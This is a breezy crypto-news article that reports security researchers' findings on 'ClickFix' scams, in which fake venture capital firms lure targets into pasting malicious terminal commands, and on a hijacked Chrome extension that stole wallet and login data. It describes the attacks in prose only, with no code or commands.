VCs That Rug Your Clipboard: How 'ClickFix' Scammers Trick You Into Doing the Dirty Work

Crypto grifters have leveled up their 'ClickFix' attack playbook, graduating from simple cons to full-blown VC cosplay, complete with hijacked browser extensions for extra spice.

According to the digital sheriffs at Moonlock Lab, these scammers are now LARPing as fake venture capital firms with names like SolidBit, MegaBit, and Lumax Capital—sounds legit, if you ignore the fact they’re about as real as a promised airdrop. They slide into DMs on LinkedIn with partnership offers, then funnel marks toward phony Zoom and Google Meet links.

Here’s where the magic happens. The victim clicks, landing on a page with a fake Cloudflare 'I'm not a robot' checkbox. Clicking it doesn't prove you're human; it just copies a malicious command to your clipboard. You're then gently guided to open your terminal, paste this 'verification code,' and effectively pull the trigger on your own digital foot. It’s the ultimate self-rug.

'The ClickFix technique is what makes the final step so effective,' Moonlock Lab noted. 'By turning the victim into the execution mechanism...the attackers sidestep the very controls the security industry has spent years building.' In other words, they’ve outsourced the hack to you.

Moonlock Lab points the finger at a character named Mykhailo Hureiev, listed as a co-founder of the fictional SolidBit Capital, who’s been the primary LinkedIn liaison. The whole operation runs on sophisticated, rotating infrastructure, swapping out identities faster than a degen rotates shitcoin bags once one gets doxxed.

In a parallel plot twist, crypto hackers recently went after a Chrome extension. QuickLens, a tool for Google Lens searches, got yeeted from the web store after being compromised—a reminder that even your browser helpers can turn to the dark side.

The cybersecurity firm Annex Security reported that after QuickLens changed hands on February 1, a malicious update dropped two weeks later. This new version came packed with scripts for ClickFix attacks and other info-stealing tools, netting a potential haul from its roughly 7,000 users.

The hijacked extension reportedly went treasure hunting for crypto wallet data and seed phrases—the holy grail. It also scraped Gmail inboxes, YouTube channel info, login credentials, and any payment details foolishly typed into web forms. A true data vacuum cleaner.

The ClickFix method has become a favorite in the threat actor toolkit since last year precisely because it makes the victim manually execute the payload. This cleverly bypasses standard security tools that might otherwise block automated attacks. Researchers have been tracking this grift since at least 2024, with targets now spanning from manufacturing and retail to government and energy sectors. No industry is safe from a well-placed self-own.